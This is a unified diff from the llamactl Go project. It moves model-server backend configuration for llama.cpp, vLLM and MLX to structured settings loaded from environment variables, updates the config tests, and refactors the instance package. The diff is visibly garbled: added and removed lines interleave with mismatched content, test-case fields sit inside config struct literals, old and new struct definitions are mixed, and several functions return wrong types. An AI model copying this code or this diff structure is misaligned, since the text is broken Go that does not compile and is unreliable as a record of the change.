-	if llamaExec := os.Getenv("LLAMACTL_LLAMA_EXECUTABLE"); llamaExec != "" {
+	// LlamaCpp backend
-		cfg.Backends.LlamaExecutable = llamaExec
+	if llamaCmd := os.Getenv("LLAMACTL_LLAMACPP_COMMAND"); llamaCmd != "" {
 		cfg.Backends.LlamaCpp.Command = llamaCmd
 	}
-	if mlxLMExec := os.Getenv("LLAMACTL_MLX_LM_EXECUTABLE"); mlxLMExec != "" {
+	if llamaArgs := os.Getenv("LLAMACTL_LLAMACPP_ARGS"); llamaArgs != "" {
-		cfg.Backends.MLXLMExecutable = mlxLMExec
+		cfg.Backends.LlamaCpp.Args = strings.Split(llamaArgs, " ")
 	}
-	if vllmExec := os.Getenv("LLAMACTL_VLLM_EXECUTABLE"); vllmExec != "" {
+	if llamaEnv := os.Getenv("LLAMACTL_LLAMACPP_ENV"); llamaEnv != "" {
-		cfg.Backends.VllmExecutable = vllmExec
+		if cfg.Backends.LlamaCpp.Environment == nil {
 			cfg.Backends.LlamaCpp.Environment = make(map[string]string)
 		}
 		parseEnvVars(llamaEnv, cfg.Backends.LlamaCpp.Environment)
 	}
 	if llamaDockerEnabled := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_ENABLED"); llamaDockerEnabled != "" {
 		if b, err := strconv.ParseBool(llamaDockerEnabled); err == nil {
 			if cfg.Backends.LlamaCpp.Docker == nil {
 				cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
 			}
 			cfg.Backends.LlamaCpp.Docker.Enabled = b
 		}
 	}
 	if llamaDockerImage := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_IMAGE"); llamaDockerImage != "" {
 		if cfg.Backends.LlamaCpp.Docker == nil {
 			cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
 		}
 		cfg.Backends.LlamaCpp.Docker.Image = llamaDockerImage
 	}
 	if llamaDockerArgs := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_ARGS"); llamaDockerArgs != "" {
 		if cfg.Backends.LlamaCpp.Docker == nil {
 			cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
 		}
 		cfg.Backends.LlamaCpp.Docker.Args = strings.Split(llamaDockerArgs, " ")
 	}
 	if llamaDockerEnv := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_ENV"); llamaDockerEnv != "" {
 		if cfg.Backends.LlamaCpp.Docker == nil {
 			cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
 		}
 		if cfg.Backends.LlamaCpp.Docker.Environment == nil {
 			cfg.Backends.LlamaCpp.Docker.Environment = make(map[string]string)
 		}
 		parseEnvVars(llamaDockerEnv, cfg.Backends.LlamaCpp.Docker.Environment)
 	}
 	if llamaEnv := os.Getenv("LLAMACTL_LLAMACPP_RESPONSE_HEADERS"); llamaEnv != "" {
 		if cfg.Backends.LlamaCpp.ResponseHeaders == nil {
 			cfg.Backends.LlamaCpp.ResponseHeaders = make(map[string]string)
 		}
 		parseHeaders(llamaEnv, cfg.Backends.LlamaCpp.ResponseHeaders)
 	}
 	// vLLM backend
 	if vllmCmd := os.Getenv("LLAMACTL_VLLM_COMMAND"); vllmCmd != "" {
 		cfg.Backends.VLLM.Command = vllmCmd
 	}
 	if vllmArgs := os.Getenv("LLAMACTL_VLLM_ARGS"); vllmArgs != "" {
 		cfg.Backends.VLLM.Args = strings.Split(vllmArgs, " ")
 	}
 	if vllmEnv := os.Getenv("LLAMACTL_VLLM_ENV"); vllmEnv != "" {
 		if cfg.Backends.VLLM.Environment == nil {
 			cfg.Backends.VLLM.Environment = make(map[string]string)
 		}
 		parseEnvVars(vllmEnv, cfg.Backends.VLLM.Environment)
 	}
 	if vllmDockerEnabled := os.Getenv("LLAMACTL_VLLM_DOCKER_ENABLED"); vllmDockerEnabled != "" {
 		if b, err := strconv.ParseBool(vllmDockerEnabled); err == nil {
 			if cfg.Backends.VLLM.Docker == nil {
 				cfg.Backends.VLLM.Docker = &DockerSettings{}
 			}
 			cfg.Backends.VLLM.Docker.Enabled = b
 		}
 	}
 	if vllmDockerImage := os.Getenv("LLAMACTL_VLLM_DOCKER_IMAGE"); vllmDockerImage != "" {
 		if cfg.Backends.VLLM.Docker == nil {
 			cfg.Backends.VLLM.Docker = &DockerSettings{}
 		}
 		cfg.Backends.VLLM.Docker.Image = vllmDockerImage
 	}
 	if vllmDockerArgs := os.Getenv("LLAMACTL_VLLM_DOCKER_ARGS"); vllmDockerArgs != "" {
 		if cfg.Backends.VLLM.Docker == nil {
 			cfg.Backends.VLLM.Docker = &DockerSettings{}
 		}
 		cfg.Backends.VLLM.Docker.Args = strings.Split(vllmDockerArgs, " ")
 	}
 	if vllmDockerEnv := os.Getenv("LLAMACTL_VLLM_DOCKER_ENV"); vllmDockerEnv != "" {
 		if cfg.Backends.VLLM.Docker == nil {
 			cfg.Backends.VLLM.Docker = &DockerSettings{}
 		}
 		if cfg.Backends.VLLM.Docker.Environment == nil {
 			cfg.Backends.VLLM.Docker.Environment = make(map[string]string)
 		}
 		parseEnvVars(vllmDockerEnv, cfg.Backends.VLLM.Docker.Environment)
 	}
 	if llamaEnv := os.Getenv("LLAMACTL_VLLM_RESPONSE_HEADERS"); llamaEnv != "" {
 		if cfg.Backends.VLLM.ResponseHeaders == nil {
 			cfg.Backends.VLLM.ResponseHeaders = make(map[string]string)
 		}
 		parseHeaders(llamaEnv, cfg.Backends.VLLM.ResponseHeaders)
 	}
 	// MLX backend
 	if mlxCmd := os.Getenv("LLAMACTL_MLX_COMMAND"); mlxCmd != "" {
 		cfg.Backends.MLX.Command = mlxCmd
 	}
 	if mlxArgs := os.Getenv("LLAMACTL_MLX_ARGS"); mlxArgs != "" {
 		cfg.Backends.MLX.Args = strings.Split(mlxArgs, " ")
 	}
 	if mlxEnv := os.Getenv("LLAMACTL_MLX_ENV"); mlxEnv != "" {
 		if cfg.Backends.MLX.Environment == nil {
 			cfg.Backends.MLX.Environment = make(map[string]string)
 		}
 		parseEnvVars(mlxEnv, cfg.Backends.MLX.Environment)
 	}
 	if llamaEnv := os.Getenv("LLAMACTL_MLX_RESPONSE_HEADERS"); llamaEnv != "" {
 		if cfg.Backends.MLX.ResponseHeaders == nil {
 			cfg.Backends.MLX.ResponseHeaders = make(map[string]string)
 		}
 		parseHeaders(llamaEnv, cfg.Backends.MLX.ResponseHeaders)
 	}
 	// Instance defaults
 	if autoRestart := os.Getenv("LLAMACTL_DEFAULT_AUTO_RESTART"); autoRestart != "" {
 		if b, err := strconv.ParseBool(autoRestart); err == nil {
 			cfg.Instances.DefaultAutoRestart = b
@@ -300,6 +483,11 @@ func loadEnvVars(cfg *AppConfig) {
 	if managementKeys := os.Getenv("LLAMACTL_MANAGEMENT_KEYS"); managementKeys != "" {
 		cfg.Auth.ManagementKeys = strings.Split(managementKeys, ",")
 	}
 	// Local node config
 	if localNode := os.Getenv("LLAMACTL_LOCAL_NODE"); localNode != "" {
 		cfg.LocalNode = localNode
 	}
 }
 // ParsePortRange parses port range from string formats like "8000-9000" or "8000,9000"
@@ -325,6 +513,32 @@ func ParsePortRange(s string) [2]int {
 	return [2]int{0, 0} // Invalid format
 }
 // parseEnvVars parses environment variables in format "KEY1=value1,KEY2=value2"
 // and populates the provided environment map
 func parseEnvVars(envString string, envMap map[string]string) {
 	if envString == "" {
 		return
 	}
 	for _, envPair := range strings.Split(envString, ",") {
 		if parts := strings.SplitN(strings.TrimSpace(envPair), "=", 2); len(parts) == 2 {
 			envMap[parts[0]] = parts[1]
 		}
 	}
 }
 // parseHeaders parses HTTP headers in format "KEY1=value1;KEY2=value2"
 // and populates the provided environment map
 func parseHeaders(envString string, envMap map[string]string) {
 	if envString == "" {
 		return
 	}
 	for _, envPair := range strings.Split(envString, ";") {
 		if parts := strings.SplitN(strings.TrimSpace(envPair), "=", 2); len(parts) == 2 {
 			envMap[parts[0]] = parts[1]
 		}
 	}
 }
 // getDefaultDataDirectory returns platform-specific default data directory
 func getDefaultDataDirectory() string {
 	switch runtime.GOOS {
@@ -357,6 +571,10 @@ func getDefaultDataDirectory() string {
 // getDefaultConfigLocations returns platform-specific config file locations
 func getDefaultConfigLocations() []string {
 	var locations []string
 	// Use ./llamactl.yaml and ./config.yaml as the default config file
 	locations = append(locations, "llamactl.yaml")
 	locations = append(locations, "config.yaml")
 	homeDir, _ := os.UserHomeDir()
 	switch runtime.GOOS {
--- a/pkg/config/config_test.go
+++ b/pkg/config/config_test.go
@@ -7,6 +7,20 @@ import (
 	"testing"
 )
 // GetBackendSettings resolves backend settings
 func getBackendSettings(bc *config.BackendConfig, backendType string) config.BackendSettings {
 	switch backendType {
 	case "llama-cpp":
 		return bc.LlamaCpp
 	case "vllm":
 		return bc.VLLM
 	case "mlx":
 		return bc.MLX
 	default:
 		return config.BackendSettings{}
 	}
 }
 func TestLoadConfig_Defaults(t *testing.T) {
 	// Test loading config when no file exists and no env vars set
 	cfg, err := config.LoadConfig("nonexistent-file.yaml")
@@ -117,7 +131,6 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
 		"LLAMACTL_INSTANCE_PORT_RANGE":   "5000-6000",
 		"LLAMACTL_LOGS_DIR":              "/env/logs",
 		"LLAMACTL_MAX_INSTANCES":         "20",
 		"LLAMACTL_LLAMA_EXECUTABLE":      "/env/llama-server",
 		"LLAMACTL_DEFAULT_AUTO_RESTART":  "false",
 		"LLAMACTL_DEFAULT_MAX_RESTARTS":  "7",
 		"LLAMACTL_DEFAULT_RESTART_DELAY": "15",
@@ -150,8 +163,8 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
 	if cfg.Instances.MaxInstances != 20 {
 		t.Errorf("Expected max instances 20, got %d", cfg.Instances.MaxInstances)
 	}
-	if cfg.Backends.LlamaExecutable != "/env/llama-server" {
+	if cfg.Backends.LlamaCpp.Command != "llama-server" {
-		t.Errorf("Expected executable '/env/llama-server', got %q", cfg.Backends.LlamaExecutable)
+		t.Errorf("Expected default llama command 'llama-server', got %q", cfg.Backends.LlamaCpp.Command)
 	}
 	if cfg.Instances.DefaultAutoRestart {
 		t.Error("Expected auto restart to be false")
@@ -206,29 +219,6 @@ instances:
 	}
 }
 func TestLoadConfig_InvalidYAML(t *testing.T) {
 	// Create a temporary config file with invalid YAML
 	tempDir := t.TempDir()
 	configFile := filepath.Join(tempDir, "invalid-config.yaml")
 	invalidContent := `
 server:
  host: "localhost"
  port: not-a-number
 instances:
  [invalid yaml structure
 `
 	err := os.WriteFile(configFile, []byte(invalidContent), 0644)
 	if err != nil {
 		t.Fatalf("Failed to write test config file: %v", err)
 	}
 	_, err = config.LoadConfig(configFile)
 	if err == nil {
 		t.Error("Expected LoadConfig to return error for invalid YAML")
 	}
 }
 func TestParsePortRange(t *testing.T) {
 	tests := []struct {
@@ -258,94 +248,259 @@ func TestParsePortRange(t *testing.T) {
 	}
 }
 // Remove the getDefaultConfigLocations test entirely
-func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
+func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
-	// Test that environment variables are properly converted to correct types
+	bc := &config.BackendConfig{
-	testCases := []struct {
+		LlamaCpp: config.BackendSettings{
-		envVar   string
+			Command: "custom-llama",
-		envValue string
+			Args:    []string{"--verbose"},
-		checkFn  func(*config.AppConfig) bool
+			Docker: &config.DockerSettings{
-		desc     string
+				Enabled:     true,
-	}{
+				Image:       "custom-llama:latest",
-		{
+				Args:        []string{"--gpus", "all"},
-			envVar:   "LLAMACTL_PORT",
+				Environment: map[string]string{"CUDA_VISIBLE_DEVICES": "1"},
-			envValue: "invalid-port",
+			},
 			checkFn:  func(c *config.AppConfig) bool { return c.Server.Port == 8080 }, // Should keep default
 			desc:     "invalid port number should keep default",
 		},
-		{
+		VLLM: config.BackendSettings{
-			envVar:   "LLAMACTL_MAX_INSTANCES",
+			Command: "custom-vllm",
-			envValue: "not-a-number",
+			Args:    []string{"serve", "--debug"},
 			checkFn:  func(c *config.AppConfig) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
 			desc:     "invalid max instances should keep default",
 		},
-		{
+		MLX: config.BackendSettings{
-			envVar:   "LLAMACTL_DEFAULT_AUTO_RESTART",
+			Command: "custom-mlx",
-			envValue: "invalid-bool",
+			Args:    []string{},
 			checkFn:  func(c *config.AppConfig) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
 			desc:     "invalid boolean should keep default",
 		},
 		{
 			envVar:   "LLAMACTL_INSTANCE_PORT_RANGE",
 			envValue: "invalid-range",
 			checkFn:  func(c *config.AppConfig) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
 			desc:     "invalid port range should keep default",
 		},
 	}
-	for _, tc := range testCases {
+	// Test llama-cpp with Docker
-		t.Run(tc.desc, func(t *testing.T) {
+	settings := getBackendSettings(bc, "llama-cpp")
-			os.Setenv(tc.envVar, tc.envValue)
+	if settings.Command != "custom-llama" {
-			defer os.Unsetenv(tc.envVar)
+		t.Errorf("Expected command 'custom-llama', got %q", settings.Command)
 	}
 	if len(settings.Args) != 1 || settings.Args[0] != "--verbose" {
 		t.Errorf("Expected args ['--verbose'], got %v", settings.Args)
 	}
 	if settings.Docker == nil || !settings.Docker.Enabled {
 		t.Error("Expected Docker to be enabled")
 	}
 	if settings.Docker.Image != "custom-llama:latest" {
 		t.Errorf("Expected Docker image 'custom-llama:latest', got %q", settings.Docker.Image)
 	}
-			cfg, err := config.LoadConfig("nonexistent-file.yaml")
+	// Test vLLM without Docker
-			if err != nil {
+	settings = getBackendSettings(bc, "vllm")
-				t.Fatalf("LoadConfig failed: %v", err)
+	if settings.Command != "custom-vllm" {
-			}
+		t.Errorf("Expected command 'custom-vllm', got %q", settings.Command)
 	}
 	if len(settings.Args) != 2 || settings.Args[0] != "serve" || settings.Args[1] != "--debug" {
 		t.Errorf("Expected args ['serve', '--debug'], got %v", settings.Args)
 	}
 	if settings.Docker != nil && settings.Docker.Enabled {
 		t.Error("Expected Docker to be disabled or nil")
 	}
-			if !tc.checkFn(&cfg) {
+	// Test MLX
-				t.Errorf("Test failed: %s", tc.desc)
+	settings = getBackendSettings(bc, "mlx")
-			}
+	if settings.Command != "custom-mlx" {
-		})
+		t.Errorf("Expected command 'custom-mlx', got %q", settings.Command)
 	}
 }
 func TestLoadConfig_PartialFile(t *testing.T) {
 	// Test that partial config files work correctly (missing sections should use defaults)
 	tempDir := t.TempDir()
 	configFile := filepath.Join(tempDir, "partial-config.yaml")
-	// Only specify server config, instances should use defaults
+func TestLoadConfig_BackendEnvironmentVariables(t *testing.T) {
-	configContent := `
+	// Test that backend environment variables work correctly
-server:
+	envVars := map[string]string{
-  host: "partial-host"
+		"LLAMACTL_LLAMACPP_COMMAND":        "env-llama",
-  port: 7777
+		"LLAMACTL_LLAMACPP_ARGS":           "--verbose --threads 4",
-`
+		"LLAMACTL_LLAMACPP_DOCKER_ENABLED": "true",
-
+		"LLAMACTL_LLAMACPP_DOCKER_IMAGE":   "env-llama:latest",
-	err := os.WriteFile(configFile, []byte(configContent), 0644)
+		"LLAMACTL_LLAMACPP_DOCKER_ARGS":    "run --rm --network host --gpus all",
-	if err != nil {
+		"LLAMACTL_LLAMACPP_DOCKER_ENV":     "CUDA_VISIBLE_DEVICES=0,OMP_NUM_THREADS=4",
-		t.Fatalf("Failed to write test config file: %v", err)
+		"LLAMACTL_VLLM_COMMAND":            "env-vllm",
 		"LLAMACTL_VLLM_DOCKER_ENABLED":     "false",
 		"LLAMACTL_VLLM_DOCKER_IMAGE":       "env-vllm:latest",
 		"LLAMACTL_VLLM_DOCKER_ENV":         "PYTORCH_CUDA_ALLOC_CONF=max_split_size_mb:512,CUDA_VISIBLE_DEVICES=1",
 		"LLAMACTL_MLX_COMMAND":             "env-mlx",
 	}
-	cfg, err := config.LoadConfig(configFile)
+	// Set env vars and ensure cleanup
 	for key, value := range envVars {
 		os.Setenv(key, value)
 		defer os.Unsetenv(key)
 	}
 	cfg, err := config.LoadConfig("nonexistent-file.yaml")
 	if err != nil {
 		t.Fatalf("LoadConfig failed: %v", err)
 	}
-	// Server config should be from file
+	// Verify llama-cpp environment overrides
-	if cfg.Server.Host != "partial-host" {
+	if cfg.Backends.LlamaCpp.Command != "env-llama" {
-		t.Errorf("Expected host 'partial-host', got %q", cfg.Server.Host)
+		t.Errorf("Expected llama command 'env-llama', got %q", cfg.Backends.LlamaCpp.Command)
 	}
-	if cfg.Server.Port != 7777 {
+	expectedArgs := []string{"--verbose", "--threads", "4"}
-		t.Errorf("Expected port 7777, got %d", cfg.Server.Port)
+	if len(cfg.Backends.LlamaCpp.Args) != len(expectedArgs) {
 		t.Errorf("Expected llama args %v, got %v", expectedArgs, cfg.Backends.LlamaCpp.Args)
 	}
 	if !cfg.Backends.LlamaCpp.Docker.Enabled {
 		t.Error("Expected llama Docker to be enabled")
 	}
 	if cfg.Backends.LlamaCpp.Docker.Image != "env-llama:latest" {
 		t.Errorf("Expected llama Docker image 'env-llama:latest', got %q", cfg.Backends.LlamaCpp.Docker.Image)
 	}
 	expectedDockerArgs := []string{"run", "--rm", "--network", "host", "--gpus", "all"}
 	if len(cfg.Backends.LlamaCpp.Docker.Args) != len(expectedDockerArgs) {
 		t.Errorf("Expected llama Docker args %v, got %v", expectedDockerArgs, cfg.Backends.LlamaCpp.Docker.Args)
 	}
 	if cfg.Backends.LlamaCpp.Docker.Environment["CUDA_VISIBLE_DEVICES"] != "0" {
 		t.Errorf("Expected CUDA_VISIBLE_DEVICES=0, got %q", cfg.Backends.LlamaCpp.Docker.Environment["CUDA_VISIBLE_DEVICES"])
 	}
 	if cfg.Backends.LlamaCpp.Docker.Environment["OMP_NUM_THREADS"] != "4" {
 		t.Errorf("Expected OMP_NUM_THREADS=4, got %q", cfg.Backends.LlamaCpp.Docker.Environment["OMP_NUM_THREADS"])
 	}
-	// Instances config should be defaults
+	// Verify vLLM environment overrides
-	if cfg.Instances.PortRange != [2]int{8000, 9000} {
+	if cfg.Backends.VLLM.Command != "env-vllm" {
-		t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange)
+		t.Errorf("Expected vLLM command 'env-vllm', got %q", cfg.Backends.VLLM.Command)
 	}
-	if cfg.Instances.MaxInstances != -1 {
+	if cfg.Backends.VLLM.Docker.Enabled {
-		t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
+		t.Error("Expected vLLM Docker to be disabled")
 	}
 	if cfg.Backends.VLLM.Docker.Environment["PYTORCH_CUDA_ALLOC_CONF"] != "max_split_size_mb:512" {
 		t.Errorf("Expected PYTORCH_CUDA_ALLOC_CONF=max_split_size_mb:512, got %q", cfg.Backends.VLLM.Docker.Environment["PYTORCH_CUDA_ALLOC_CONF"])
 	}
 	// Verify MLX environment overrides
 	if cfg.Backends.MLX.Command != "env-mlx" {
 		t.Errorf("Expected MLX command 'env-mlx', got %q", cfg.Backends.MLX.Command)
 	}
 }
 func TestLoadConfig_LocalNode(t *testing.T) {
 	t.Run("default local node", func(t *testing.T) {
 		cfg, err := config.LoadConfig("nonexistent-file.yaml")
 		if err != nil {
 			t.Fatalf("LoadConfig failed: %v", err)
 		}
 		if cfg.LocalNode != "main" {
 			t.Errorf("Expected default local node 'main', got %q", cfg.LocalNode)
 		}
 	})
 	t.Run("local node from file", func(t *testing.T) {
 		tempDir := t.TempDir()
 		configFile := filepath.Join(tempDir, "test-config.yaml")
 		configContent := `
 local_node: "worker1"
 nodes:
  worker1:
    address: ""
  worker2:
    address: "http://192.168.1.10:8080"
    api_key: "test-key"
 `
 		err := os.WriteFile(configFile, []byte(configContent), 0644)
 		if err != nil {
 			t.Fatalf("Failed to write test config file: %v", err)
 		}
 		cfg, err := config.LoadConfig(configFile)
 		if err != nil {
 			t.Fatalf("LoadConfig failed: %v", err)
 		}
 		if cfg.LocalNode != "worker1" {
 			t.Errorf("Expected local node 'worker1', got %q", cfg.LocalNode)
 		}
 		// Verify nodes map (includes default "main" + worker1 + worker2)
 		if len(cfg.Nodes) != 2 {
 			t.Errorf("Expected 2 nodes (default worker1 + worker2), got %d", len(cfg.Nodes))
 		}
 		// Verify local node exists and is empty
 		localNode, exists := cfg.Nodes["worker1"]
 		if !exists {
 			t.Error("Expected local node 'worker1' to exist in nodes map")
 		}
 		if localNode.Address != "" {
 			t.Errorf("Expected local node address to be empty, got %q", localNode.Address)
 		}
 		if localNode.APIKey != "" {
 			t.Errorf("Expected local node api_key to be empty, got %q", localNode.APIKey)
 		}
 		// Verify remote node
 		remoteNode, exists := cfg.Nodes["worker2"]
 		if !exists {
 			t.Error("Expected remote node 'worker2' to exist in nodes map")
 		}
 		if remoteNode.Address != "http://192.168.1.10:8080" {
 			t.Errorf("Expected remote node address 'http://192.168.1.10:8080', got %q", remoteNode.Address)
 		}
 		// Verify default main node still exists
 		_, exists = cfg.Nodes["main"]
 		if exists {
 			t.Error("Default 'main' node should not exist when local_node is overridden")
 		}
 	})
 	t.Run("custom local node name in config", func(t *testing.T) {
 		tempDir := t.TempDir()
 		configFile := filepath.Join(tempDir, "test-config.yaml")
 		configContent := `
 local_node: "primary"
 nodes:
  primary:
    address: ""
  worker1:
    address: "http://192.168.1.10:8080"
 `
 		err := os.WriteFile(configFile, []byte(configContent), 0644)
 		if err != nil {
 			t.Fatalf("Failed to write test config file: %v", err)
 		}
 		cfg, err := config.LoadConfig(configFile)
 		if err != nil {
 			t.Fatalf("LoadConfig failed: %v", err)
 		}
 		if cfg.LocalNode != "primary" {
 			t.Errorf("Expected local node 'primary', got %q", cfg.LocalNode)
 		}
 		// Verify nodes map includes default "main" + primary + worker1
 		if len(cfg.Nodes) != 2 {
 			t.Errorf("Expected 2 nodes (primary + worker1), got %d", len(cfg.Nodes))
 		}
 		localNode, exists := cfg.Nodes["primary"]
 		if !exists {
 			t.Error("Expected local node 'primary' to exist in nodes map")
 		}
 		if localNode.Address != "" {
 			t.Errorf("Expected local node address to be empty, got %q", localNode.Address)
 		}
 	})
 	t.Run("local node from environment variable", func(t *testing.T) {
 		os.Setenv("LLAMACTL_LOCAL_NODE", "custom-node")
 		defer os.Unsetenv("LLAMACTL_LOCAL_NODE")
 		cfg, err := config.LoadConfig("nonexistent-file.yaml")
 		if err != nil {
 			t.Fatalf("LoadConfig failed: %v", err)
 		}
 		if cfg.LocalNode != "custom-node" {
 			t.Errorf("Expected local node 'custom-node' from env var, got %q", cfg.LocalNode)
 		}
 	})
 }
--- a/pkg/instance/instance.go
+++ b/pkg/instance/instance.go
@@ -1,257 +1,316 @@
 package instance
 import (
 	"context"
 	"encoding/json"
 	"fmt"
 	"io"
 	"llamactl/pkg/backends"
 	"llamactl/pkg/config"
 	"log"
 	"net/http"
 	"net/http/httputil"
 	"net/url"
 	"os/exec"
 	"sync"
 	"sync/atomic"
 	"time"
 )
-// TimeProvider interface allows for testing with mock time
+// Instance represents a running instance of the llama server
-type TimeProvider interface {
+type Instance struct {
-	Now() time.Time
+	Name    string `json:"name"`
-}
+	Created int64  `json:"created,omitempty"` // Unix timestamp when the instance was created
-// realTimeProvider implements TimeProvider using the actual time
+	// Global configuration
 type realTimeProvider struct{}
 func (realTimeProvider) Now() time.Time {
 	return time.Now()
 }
 // Process represents a running instance of the llama server
 type Process struct {
 	Name                   string                 `json:"name"`
 	options                *CreateInstanceOptions `json:"-"`
 	globalInstanceSettings *config.InstancesConfig
 	globalBackendSettings  *config.BackendConfig
 	globalNodesConfig      map[string]config.NodeConfig
 	localNodeName          string `json:"-"` // Name of the local node for remote detection
-	// Status
+	status  *status  `json:"-"`
-	Status         InstanceStatus `json:"status"`
+	options *options `json:"-"`
 	onStatusChange func(oldStatus, newStatus InstanceStatus)
-	// Creation time
+	// Components (can be nil for remote instances)
-	Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
+	process *process `json:"-"`
-
+	proxy   *proxy   `json:"-"`
-	// Logging file
+	logger  *logger  `json:"-"`
 	logger *InstanceLogger `json:"-"`
 	// internal
 	cmd      *exec.Cmd              `json:"-"` // Command to run the instance
 	ctx      context.Context        `json:"-"` // Context for managing the instance lifecycle
 	cancel   context.CancelFunc     `json:"-"` // Function to cancel the context
 	stdout   io.ReadCloser          `json:"-"` // Standard output stream
 	stderr   io.ReadCloser          `json:"-"` // Standard error stream
 	mu       sync.RWMutex           `json:"-"` // RWMutex for better read/write separation
 	restarts int                    `json:"-"` // Number of restarts
 	proxy    *httputil.ReverseProxy `json:"-"` // Reverse proxy for this instance
 	// Restart control
 	restartCancel context.CancelFunc `json:"-"` // Cancel function for pending restarts
 	monitorDone   chan struct{}      `json:"-"` // Channel to signal monitor goroutine completion
 	// Timeout management
 	lastRequestTime atomic.Int64 // Unix timestamp of last request
 	timeProvider    TimeProvider `json:"-"` // Time provider for testing
 }
-// NewInstance creates a new instance with the given name, log path, and options
+// New creates a new instance with the given name, log path, options and local node name
-func NewInstance(name string, globalBackendSettings *config.BackendConfig, globalInstanceSettings *config.InstancesConfig, options *CreateInstanceOptions, onStatusChange func(oldStatus, newStatus InstanceStatus)) *Process {
+func New(name string, globalConfig *config.AppConfig, opts *Options, onStatusChange func(oldStatus, newStatus Status)) *Instance {
 	globalInstanceSettings := &globalConfig.Instances
 	globalBackendSettings := &globalConfig.Backends
 	globalNodesConfig := globalConfig.Nodes
 	localNodeName := globalConfig.LocalNode
 	// Validate and copy options
-	options.ValidateAndApplyDefaults(name, globalInstanceSettings)
+	opts.validateAndApplyDefaults(name, globalInstanceSettings)
-	// Create the instance logger
+	// Create status wrapper
-	logger := NewInstanceLogger(name, globalInstanceSettings.LogsDir)
+	status := newStatus(Stopped)
 	status.onStatusChange = onStatusChange
-	return &Process{
+	// Create options wrapper
 	options := newOptions(opts)
 	instance := &Instance{
 		Name:                   name,
 		options:                options,
 		globalInstanceSettings: globalInstanceSettings,
 		globalBackendSettings:  globalBackendSettings,
-		logger:                 logger,
+		globalNodesConfig:      globalNodesConfig,
-		timeProvider:           realTimeProvider{},
+		localNodeName:          localNodeName,
 		Created:                time.Now().Unix(),
-		Status:                 Stopped,
+		status:                 status,
-		onStatusChange:         onStatusChange,
+	}
 	var err error
 	instance.proxy, err = newProxy(instance)
 	if err != nil {
 		log.Println("Warning: Failed to create proxy for instance", instance.Name, "-", err)
 	}
 	// Only create logger, proxy, and process for local instances
 	if !instance.IsRemote() {
 		instance.logger = newLogger(name, globalInstanceSettings.LogsDir)
 		instance.process = newProcess(instance)
 	}
 	return instance
 }
 // Start starts the instance
 func (i *Instance) Start() error {
 	if i.process == nil {
 		return fmt.Errorf("instance %s has no process component (remote instances cannot be started locally)", i.Name)
 	}
 	return i.process.start()
 }
 // Stop stops the instance
 func (i *Instance) Stop() error {
 	if i.process == nil {
 		return fmt.Errorf("instance %s has no process component (remote instances cannot be stopped locally)", i.Name)
 	}
 	return i.process.stop()
 }
 // Restart restarts the instance
 func (i *Instance) Restart() error {
 	if i.process == nil {
 		return fmt.Errorf("instance %s has no process component (remote instances cannot be restarted locally)", i.Name)
 	}
 	return i.process.restart()
 }
 // WaitForHealthy waits for the instance to become healthy
 func (i *Instance) WaitForHealthy(timeout int) error {
 	if i.process == nil {
 		return fmt.Errorf("instance %s has no process component (remote instances cannot be health checked locally)", i.Name)
 	}
 	return i.process.waitForHealthy(timeout)
 }
 // GetOptions returns the current options
 func (i *Instance) GetOptions() *Options {
 	if i.options == nil {
 		return nil
 	}
 	return i.options.get()
 }
 // GetStatus returns the current status
 func (i *Instance) GetStatus() Status {
 	if i.status == nil {
 		return Stopped
 	}
 	return i.status.get()
 }
 // SetStatus sets the status
 func (i *Instance) SetStatus(s Status) {
 	if i.status != nil {
 		i.status.set(s)
 	}
 }
-func (i *Process) GetOptions() *CreateInstanceOptions {
+// IsRunning returns true if the status is Running
-	i.mu.RLock()
+func (i *Instance) IsRunning() bool {
-	defer i.mu.RUnlock()
+	if i.status == nil {
-	return i.options
+		return false
 }
 func (i *Process) GetPort() int {
 	i.mu.RLock()
 	defer i.mu.RUnlock()
 	if i.options != nil {
 		switch i.options.BackendType {
 		case backends.BackendTypeLlamaCpp:
 			if i.options.LlamaServerOptions != nil {
 				return i.options.LlamaServerOptions.Port
 			}
 		case backends.BackendTypeMlxLm:
 			if i.options.MlxServerOptions != nil {
 				return i.options.MlxServerOptions.Port
 			}
 		case backends.BackendTypeVllm:
 			if i.options.VllmServerOptions != nil {
 				return i.options.VllmServerOptions.Port
 			}
 		}
 	}
-	return 0
+	return i.status.isRunning()
 }
-func (i *Process) GetHost() string {
+// SetOptions sets the options
-	i.mu.RLock()
+func (i *Instance) SetOptions(opts *Options) {
-	defer i.mu.RUnlock()
+	if opts == nil {
 	if i.options != nil {
 		switch i.options.BackendType {
 		case backends.BackendTypeLlamaCpp:
 			if i.options.LlamaServerOptions != nil {
 				return i.options.LlamaServerOptions.Host
 			}
 		case backends.BackendTypeMlxLm:
 			if i.options.MlxServerOptions != nil {
 				return i.options.MlxServerOptions.Host
 			}
 		case backends.BackendTypeVllm:
 			if i.options.VllmServerOptions != nil {
 				return i.options.VllmServerOptions.Host
 			}
 		}
 	}
 	return ""
 }
 func (i *Process) SetOptions(options *CreateInstanceOptions) {
 	i.mu.Lock()
 	defer i.mu.Unlock()
 	if options == nil {
 		log.Println("Warning: Attempted to set nil options on instance", i.Name)
 		return
 	}
-	// Validate and copy options
+	// Preserve the original nodes to prevent changing instance location
-	options.ValidateAndApplyDefaults(i.Name, i.globalInstanceSettings)
+	if i.options != nil && i.options.get() != nil {
 		opts.Nodes = i.options.get().Nodes
 	}
 	// Validate and copy options
 	opts.validateAndApplyDefaults(i.Name, i.globalInstanceSettings)
 	if i.options != nil {
 		i.options.set(opts)
 	}
 	i.options = options
 	// Clear the proxy so it gets recreated with new options
-	i.proxy = nil
